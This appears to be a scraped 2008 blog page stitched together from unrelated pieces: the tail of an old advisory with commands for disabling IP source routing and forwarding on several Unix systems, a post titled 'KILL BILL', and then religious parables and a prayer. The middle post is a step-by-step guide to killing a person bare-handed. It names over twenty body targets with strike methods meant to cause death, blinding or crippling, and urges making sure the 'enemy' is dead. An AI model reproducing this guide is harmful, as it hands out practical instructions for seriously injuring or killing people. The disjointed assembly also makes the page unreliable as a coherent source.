Previous versions ship with source routing ENABLED by default. As far as we know, BSD/OS cannot be configured to drop source routed packets destined for itself, however can be configured to prevent the forwarding of such packets when acting as a gateway.

To determine whether forwarding of source routed packets is enabled, issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

— OpenBSD

Ships with source routing turned off by default. To determine whether source routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off, and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

This will prevent OpenBSD from forwarding and accepting any source routed packets.

— FreeBSD

Ships with source routing turned off by default. To determine whether source routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off, and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

— Linux

Linux by default has source routing disabled in the kernel.

— Solaris 2.x

Ships with source routing enabled by default. Solaris 2.5.1 is one of the few commercial operating systems that does have unpredictable sequence numbers, which does not help in this attack.

We know of no method to prevent Solaris from accepting source routed connections, however, Solaris systems acting as gateways can be prevented from forwarding any source routed packets via the following commands:

# ndd -set /dev/ip ip_forward_src_routed 0

You can prevent forwarding of all packets via:

# ndd -set /dev/ip ip_forwarding 0

These commands can be added to /etc/rc2.d/S69inet to take effect at bootup.

— SunOS 4.x

We know of no method to prevent SunOS from accepting source routed connections, however a patch is availible to prevent SunOS systems from forwarding source routed packets.

This patch is availible at:

ftp://ftp.secnet.com/pub/patches/source-routing-patch.tar.gz

To configure SunOS to prevent forwarding of all packets, the following command can be issued:

# echo “ip_forwarding/w 0″ | adb -k -w /vmunix /dev/mem
# echo “ip_forwarding?w 0″ | adb -k -w /vmunix /dev/mem

The first command turns off packet forwarding in /dev/mem, the second in /vmunix.

— HP-UX

HP-UX does not appear to have options for configuring an HP-UX system to prevent accepting or forwarding of source routed packets. HP-UX has IP forwarding turned on by default and should be turned off if acting as a firewall. To determine whether IP forwarding is currently on, the following
command can be issued:

# adb /hp-ux
ipforwarding?X <- user input ipforwarding: ipforwarding: 1 #

A response of 1 indicates IP forwarding is ON, 0 indicates off. HP-UX can be configured to prevent the forwarding of any packets via the following commands:

# adb -w /hp-ux /dev/kmem
ipforwarding/W 0
ipforwarding?W 0
^D
#

— AIX

AIX cannot be configured to discard source routed packets destined for itself, however can be configured to prevent the forwarding of source routed packets. IP forwarding and forwarding of source routed packets specifically can be turned off under AIX via the following commands:

To turn off forwarding of all packets:

# /usr/sbin/no -o ipforwarding=0

To turn off forwarding of source routed packets:

# /usr/sbin/no -o nonlocsrcroute=0

Note that these commands should be added to /etc/rc.net

If shutting off source routing is not possible and you are still using services which rely on IP address authentication, they should be disabled immediately (in.rshd, in.rlogind). in.rlogind is safe if .rhosts and
/etc/hosts.equiv are not used.

Thursday, August 28, 2008

KILL BILL

This post will teach you how you can kill another person with your own two
hands. The information presented here will be very helpful to the beginner and
will also serve as a refresher for those of you already familiar with the
subject.
 
I will start off by talking about basic things such as stance, what you should
and shouldn't do when fighting and other information that the beginner will
need to know. Then, I will give you a list of over 20 vulnerable points that
one should always try attacking in a fight along with the way these points
should be attacked. Finally, I will give you some more fighting tips and
information on how you can continue learning about hand-to-hand combat.
 
                                      ^*^
 
Now, let me discuss some of the basics you will need to know when you are in
any combat situation.
 
Stance
------
The best stance when confronting an enemy is to put your feet at shoulders
length apart and your arms should be facing forward, parallel to each other and
bent at the elbows. Keep your knees slightly bent and stand on the balls of
your feet.
 
Remember, you always want to maintain this stance when you are not striking at
the enemy.
 
Balance
-------
It is always important that you keep your balance. If you use the stance I have
described above, you will never have to worry about it. If by chance you do
lose your balance even for a second you can kiss your ass goodbye as the enemy
will probably kill you.
 
Aggressiveness
--------------
Always be aggressive and always attack. Don't just stand back and defend
yourself against the enemy's strikes as he will end up killing you eventually.
If you are not aggressive, the enemy will think you are scared and he will have
an advantage over you.
 
A great thing to do is yell at the enemy. This will scare the shit out of him
if you start yelling at him and plus it also allows you to get more oxygen in
your lungs so you will have more strength.
 
Natural Weapons
---------------
Your natural weapons are as follows: knife edge of either hand, the heel of
your hands, your fingers folded at the second knuckle, your boot, your elbow,
your knees, your teeth, your fore finger and second finger forming a "V" shape,
and your fist. These body parts alone are some of the most powerful weapons you
can use.
 
                                      ^*^
 
Since you now know the basics of fighting, let me list for you the best places
where you should strike your enemy.
 
Temple
------
A sharp blow to the temple ensures instant death since there is a large artery
and nerve located close to the skin surface. If you give a medium blow to the
temple it will cause severe pain and concussion but a hard blow will kill the
enemy instantly. The best way to strike the temple is with the knife edge of
your hand or if he is on the ground you can kick him with the toe of your boot.
 
Eyes
----
The eyes are a great place to strike if you can since a good strike in the eyes
will cause temporary or permanent blindness. To blind the enemy, make a "V"
shape with your fore finger and second finger and stick them into his eyes
while keeping your fingers stiff. Also, you can gouge the eyes with your thumb.
 
Nose
----
The nose is another excellent place to attack. Hit the bridge with the knife
edge of your hand and you will cause breakage, severe pain, temporary blindness
and even death. Or you can use the palm of your hand to strike upwards and push
the nose up into his brain. If done hard enough the nose bone will puncture his
brain and he will die.
 
Upper Lip
---------
The upper lip contains a lot of nerves close to the skin surface so if you
strike it with the knife edge of your hand it will cause great pain and if
delivered hard enough he will become unconscious.
 
Mouth
-----
If the enemy is on the ground, use the heel of your boot and strike him on the
mouth. Since there are a lot of veins and arteries in the teeth there will be a
lot of blood which will frighten the enemy and he will lose concentration on
defending other parts of his body.
 
Chin
----
The chin should only be struck with the palm of your hand as you can break your
fingers on the enemy's chin. Use the palm of your hand and strike the enemy
with a very strong upward blow. This will cause extreme discomfort.
 
Adam's Apple
------------
Usually the enemy will defend this part of his body well but if you do get the
chance give it a sharp hit with the knife edge of your hand. If you hit it hard
enough you will bust his windpipe and he will die. You can also squeeze the
Adam's Apple between your fingers.
 
Esophagus
---------
If you have a chance to get a hold of his neck, press your thumbs into his
esophagus (located below the Adam's Apple). Pushing hard will be very painful
and it will block the oxygen flow to his lungs and he will die quickly.
 
Neck
----
If you give a very strong blow to the base of the neck with the knife edge of
your hand you will usually break it. However, if it is not hard enough, the
enemy might just be knocked unconscious so be sure to hit him in the temple or
twist his neck around to be sure he is dead. The neck is the best place to hit
someone if you want to be quiet as it is quick and the enemy goes down without
a word.
 
Collar Bone
-----------
The collar bone is an extremely sensitive part of the body. A sharp blow to it
with the knife edge of your hand or your elbow gives the enemy excruciating
pain. Also, digging your finger into the collar bone can bring your enemy to
his knees.
 
Shoulder
--------
The shoulder is easy dislocated and it takes little strength to do. However, it
should be done quickly. Grab the enemy's arm and pull it behind his back and
then jerk it upwards quickly. You should here a popping sound which means you
have dislocated the enemy's shoulder. There are other methods of doing this but
this is the easiest.
 
Armpit
------
Although it is hard to get at, the armpit has a large network of nerves. If the
enemy is on the ground, hold up his arm and then kick him in his pit. This will
cause severe pain. However, it is not a very common place that will be struck
in a fight but is good to keep in mind anyways.
 
Rib Cage
--------
A strike to the rib cage with your fingers folded at the second knuckle is
rather painful and if done hard enough causes severe pain and breakage. Only
use your fingers folded at the second knuckle since that hurts the most.
 
Solar Plexus
------------
The solar plexus is located on the chest at the little "V" shaped point where
the rib cage ends. There are a large amount of nerves so a blow with the
knuckle of your second finger can cause severe pain and even unconsciousness.
 
Floating Ribs
-------------
The floating ribs are the lower ribs located at the front and sides of the
enemy's body. Use the knife edge of your hand or the heel or toe of your boot.
The blow will cause pain and will stun the enemy.
 
Spine
-----
A blow to the spine with the heel of your boot can paralyze or kill your enemy.
The lower spine between the enemy's kidneys is the best place to hit as that is
the least protected part of the spine. You will only be able to attack the
spine when your enemy is on the ground or if his back is turned to you.
 
Kidneys
-------
The kidneys have two large nerves that are close to the skin surface. If you
strike the kidneys hard it will cause death. You can use a fist or the knife
edge of your hand to hit the kidneys. Or a kick with the heel of your boot will
work too.
 
Groin
-----
The groin is a good place to strike if you get the chance. Generally, the enemy
will protect this area the most but if you have a chance, strike it with your
knee in an upward motion or with your fist. I'm sure you can imagine the pain
the enemy will get from it.
 
Tailbone
--------
The tailbone which is located above the anus is a very sensitive part of the
body as a lot of spinal nerves are located there. Use the toe of your boot to
strike the tailbone. The pain from that is unbelievably severe.
 
Elbow
-----
The elbow is easy to break or dislocate. Pull the enemy's arm behind him and
with the palm of your hand push his elbow inwards until it either cracks or
pops. When the enemy has a useless arm, you have a great advantage over him.
 
Fingers
-------
The fingers should be broken because the enemy becomes almost helpless with
broken fingers. Grab the enemy's arm with one hand and with the other hand push
the fingers upwards until they snap. It is only necessary to break the first
two fingers. It is also helpful in breaking a grip.
 
Knee
----
You can destroy the knee by kicking it with the side of your boot in an upward
motion. This will rip the ligaments and the cartilage. This will cause
unbelievable pain and make it impossible for the enemy to move around. Once a
knee has been ruined, you will have a great advantage over the enemy.
 
Ankle
-----
If the enemy is on the ground, get a hold of his ankle and twist it until it
snaps. This will make it almost impossible for him to walk and he will then be
easy to kill.
 
                                      ^*^
 
Let me talk about some more important things you should remember when you are
fighting somebody.
 
Tactics
-------
Always try to throw your enemy off balance. You can do this by charging the
enemy and pretending to strike him. This will make him flinch and lose his
balance.
 
Always look for a weak spot and attack it. Whenever he leaves a vulnerable part
of his body unprotected attack it with all your strength. By doing this, he
will then try to protect the part of his body that you just struck thus leaving
even more unprotected parts open.
 
Use any available object that you can. By this I mean throw sand in his eyes,
block his strikes by hitting him with a large branch, or any other kind of
available material that can be used as a weapon against him.
 
Foul Play
---------
In a life or death situation there is no such thing as foul play and there are
no rules either. Although hitting someone in the groin is considered a cheap
shot in high school, it is a very effective way of destroying your enemy. Just
hit him where you can and kick him when he's down. That way, he will never get
back up again.
 
                                      ^*^
 
I have now explained to you the basics of fighting and the best places to
attack your enemy on his body. Just because you have read this file doesn't
mean you will be able to go out and kick somebody's ass in. These methods take
a lot of practice in order to do them properly.
 
If you enjoyed this file and would like to practice these methods get a partner
who is also interested in this and work on each type of strike and kick. When
you first start out, go slowly and remember that these methods are deadly and
do not require much force to be effective so take it easy on your partner.
 
Some of you may decide that practicing is not enough and you would like to
learn more than what I have told you in the above. Well, there are several good
books with illustrations on this subject which go into much more detail than I
ever could in this file. The book I used mainly to write this file was "The
Marine Corps Field Manual on Physical Security". You can get this book through
a good book store or if you happen to know a marine, he can get you a copy very
easily.
 
There are also camps where you can go for 1-2 weeks to learn all sorts of
things like this such as firing weapons, detailed hand-to-hand combat, doing
raids on enemies and all sorts of other stuff like that. The instructors that
teach these programs are well trained and have had years of experience with
this. However, usually you have to be 18 years or older to get into these
programs and you have to be very serious about it as well. This is not one of
those programs where you can say "Time-out, I need to rest." They don't stop
just to suit you. To get more information about these programs, you can usually
find out about them in magazines like "Soldier of Fortune" and other magazines
with similar theme.

Wednesday, August 27, 2008

STORIES ABOUT A PARDON

Pardon is a two-way street: whenever we pardon someone, we are also pardoning ourselves. If we are tolerant towards others, it is easier to accept our own mistakes. From that moment on, free of guilt and bitterness, we manage to take a better attitude towards life.

Peter asked Christ: "Master, do I have to pardon my neighbor seven time?" And Christ answered: "Not just seven times but seventy times." Not being a saint, I often find it hard to pardon;it is difficult to accept certain injustices. But I manage to use my will power and control myself, then later on i understand that I always come out winning when I act in this way.

Tuesday, August 26, 2008

A PRAYER IN A CHURCH

I found the text in Russian and i asked my friend to interpret it . According to him, below the prayer was a note saying that it was part of the Ojibwa tradition. Since i do not know what tradition is referred to, I reproduce only the words written:

" I have sought to understand the voice of the wind and the breath that created me, so listen to me.
" I come to thee as one of Your many children. I am fallible and small ; I need Your wisdom and strength. Let me walk in Your beauty, and make my eyes always see the red and purple of dusk. Make my hands respect the things that You have created, and enable my ears to understand Your voice.
"Make me wise so that i can absorb what You have taught my people and learn the lessons that You hane hidden in each leaf and each rock.

" I beg You for strength and wisdom, not to be better than my brothers but so that I can defeat the worst enemy i have: myself. In that way my spirit will be able to return to You without sin."

THE WISE MAN

A Chinese wise man boarded a ship that was leaving the city to cross the Pacific Ocean. His presence was noted by the other passengers, who came to ask his advice on everything. He patiently listened to all, but always said the same thing:

"Be aware of death . That will make you live each day more intensely."

The passengers quickly grew tired of the wise man. In the middle of the journey a storm almost sank the ship; there were endless hours of despair - except for the Chinese passenger , who remained peaceful all the time . When the sea calmed down , someone asked him:


"I wonder whether you noticed that between life and death there was only a wooden shell protecting us?"

"Yes," was the answer. "And I wonder whether you noticed that in everyday life there is less than that protecting us?"

Siberian shamans

The shaman decided to leave his best disciple on the bank of a river that flows into Lake Baikal so that he can spend his life in meditation.

"But do take care not to get confused by the path itself, " he warned .

One night mice ate the disciple's loincloth.The young man found a cat to kill the mice, but he needed milk to feed the cat.

He began to beg. Since he spent no money, he saved up and bought a cow; in that way there would never be any lack of milk. To feed the cow he tilled the neighbor's field in exchange for a part of the land. After a lot of hard toil he managed to have an excellent harvest and also arranged a wife for himself. His wife had a knack of business and years later, when the shaman passed through the area, he found him changed into a prosperous businessman.


"What does all this mean?" he asked.

"You won't believe it," said the disciple, "but this was the only way to save my loincloth!"